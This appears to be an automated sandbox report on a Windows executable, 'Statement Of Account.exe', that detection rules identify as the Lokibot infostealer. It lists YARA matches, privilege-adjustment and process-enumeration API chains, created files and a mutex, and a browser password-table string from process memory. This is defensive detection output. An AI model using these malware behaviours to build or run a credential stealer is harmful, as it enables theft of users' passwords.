Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Statement Of Account.exe

Static PE information: Section: UPX1 ZLIB complexity 0.9933401031783681

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/3@0/1

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0044AF5C GetLastError,FormatMessageW,

0_2_0044AF5C

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,	0_2_00464422
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,	0_2_004364AA
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,	3_2_00464422
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,	3_2_004364AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	10_2_0040650A

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D517

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,

0_2_0043701F

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,

0_2_0047A999

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043614F

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 10_2_00123360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

10_2_00123360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 10_2_00123360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

10_2_00123360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\Statement Of Account.exe

File created: C:\Users\user\AppData\Local\Temp\disimmure

Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 0000000A.00000003.2139582226.0000000004D95000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Statement Of Account.exe	ReversingLabs: Detection: 47%
Source: Statement Of Account.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\Statement Of Account.exe

File read: C:\Users\user\Desktop\Statement Of Account.exe

Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Section loaded: version.dll	Jump to behavior
